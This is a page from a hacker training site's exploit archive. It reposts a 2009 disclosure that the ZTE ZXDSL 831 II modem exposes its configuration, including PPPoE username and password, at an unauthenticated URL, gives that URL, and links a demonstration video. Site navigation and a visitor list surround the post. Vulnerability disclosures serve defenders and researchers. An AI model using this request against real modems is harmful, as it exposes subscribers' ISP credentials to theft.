EG Information

Main Index
EG Manual
Disclaimer
Legal Information
Hall of Fame
Hall of Shame
Member Rankings
Members List
Meet the Staff
Hacker's Home Page
IRC Flash Chat

Training Missions

Read Me First
Basic Skills
Realistic Scenarios
Cryptography
Software Cracking
Linux ELF Binary Cracking
Logical Thinking
Programming
Captcha Cracking
Patching
Steganography
Deface This Wall
/dev/null
/dev/urandom
/dev/extra

Knowledge Bank

Discussion Forums
Exploit Database
PasteBin
RSS Feeds RSS
Articles / Tutorials
Videos
Online EG MP3 Player Radio
Downloads
Tools

Code Resources

Submit Code
Ajax
ASM
Bash
C
CPP
Csharp
Delphi
Haskell
Java
Javascript
Jython
Lisp
mIRC
MySQL
Perl
PHP
Python
QBASIC
VisualBasic

Pimp Us Out!

Review enigmagroup.org on alexa.com

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site And Create A Link Back To Enigma Group.

Enigma Group

Enigma Group

Enigma Group

Enigma Group
 

Exploits - Enigma Group

Exploit Archive >> Platform Exploits >> hardware Exploits >> remote

"ZTE ZXDSL 831 II Modem Arbitrary Configuration Access Vulnerability"
-----------------------------------------------------
    -->> Found By  SuNHouSe2 [ALGERIAN HaCkEr] <<--
           --> Made in "Maghnia City" (DZ) <--
          --> Contact : sunhouse2@yahoo.com <--
        --> Greetz to : His0k4 all my friends <--
          --> Good Ramadan to all muslims <--
-----------------------------------------------------

Exploit tested on modem with this informations :

ZTE CORPORATION

Date             : NOV 2008
Product          : ADSL Modem
Model            : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG
Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV
 
-----------------------------------------------------
Introduction:

This modem is used by many providers in the world like 
russia india and algeria [used by provider and all clients of "Easy ADSL"].

Exploit :
We can get access to  to configuration of the modem , and get PPPOE user & password.

Go only here
http://192.168.1.1/vpivci.cgi

A video uploaded to explain how we can use this exploit to get PPPOE sessions
with user & password

download video demonstration > 

http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar

------------------------------------------------------

# enigmagroup.org [2009-08-18]

 

Who Visited EnigmaGroup Today?

2079 Guests, 212 Users (137 Spiders)
71837362, bavadava, USA, nueb, Ferdi, SynxINC, schrabbel123, eubahcomyn, zigurat, xert, Gregsen, x86basics, Brandanon, theshady, pollolololo, zapfire86, lilbl@ckb1rdie, xxlarsnorxx, sjaekel, c0re, BlubberBaum, GMIS21, r3zn3t, woerdjesloerdje, ph0tek, dansky500, painerp, sh3LLgH0s7, Crimson_King, bezdnade, crzymnky20, L3VO36, PeterMvZ, baksotikus, M3SSI4H, Alpha Et Omega, migmig765, rapper1012, Isa, Lucky, true, sshu007, PaulB, laufeninwand, dark_void, MattB543, amone, kikoWicked, Racoon, Ullson, statix, ellisp, dannysdeng, Plegerz, BlackToad, Vangrand, AKdl, Siimon, gitesh, iore, Jermano, Handsan34, JayJayJay, ?????, EzzHacker, sonaz, Anonanonamous, napoleon, maxuris, Häkkeri007, nitohu, JulezHD, bassbone, miliardo18, babyShark, timmey112, ArcaneShadow, BOLT3R, Heise, alvildaa, Nightraven, PimpDaddyMoose, FrankyxD, skriptkid, effy, pnoltof, Mehmet, G31TER, graceactually, Bulletsinthebrain, ThuyNguyen, Logge, Christian.ballerscheff, klammydia, JayHunt, BootZY, $$SKR!LLEX$$, VitoxDeoxys, lucas250, jbmollehacking, JC06dc5, rydorn, McFury_SJ, LlinksRechts, klotzi, icke4560, coyote86, groove, BlackPredat0r, rohitkumar, ctf_t31, eredar87, tomblues, EP50, Loox1234, N0tM3, Rakybrabe, hacker1509, IzNoGouD, CJ_Omaha, Megji, mmtline, xTiMMaEx, 5yn4x, seckls, BlackSmileNr1, ReeWiiPeeDii, safak21, zenkoden, ladiedadie@outlook.com, SkillerTBG, Sameer Kumar, toor, Yova, analfabet, alaers, Jedgedriels, d3ad7rack, turtleprince, MAsterV, inf22, ChriZzn, mobashua, jellyfish, LionheArtPC, Pobiega, fujin, psychomarine, EVallecil, ndseven, kuteminh11, cor3dump, xalpine, taher, juelzxyo, Rahuldas, biswas.sunny, GMQDK, bdbastard, avehwing, lol, Sagar Dalvi, Robertdono, VTreloar, saikrain, harish16416, TamyaAda25, Nemoxias, cbrxde, MohamadAttat, RichardSl, uccio97, seL4k, dan_parker823, Neodym, ynkelvin, quakelton, mrfreem4n, Dirtymind, Kornfeld, koolzfire, Mobix, Baru, Evil1, cvbnmabcd, thomasoddy, Journee1599, cve916, kupengpat, A11pack, Charizma, HowK, dung, Halfi, Inuyaki, niggabuff, yaca13, AUmike, kr4shr00t, eague, martin13579, pow3rline, Synthis, Physixilian, th3mi55sp3lla, TheStartingTim, Apathetic, khoaha143, negasora, Saine, miketest, peet42
 
Enigma Group
Compete EnigmaGroup.org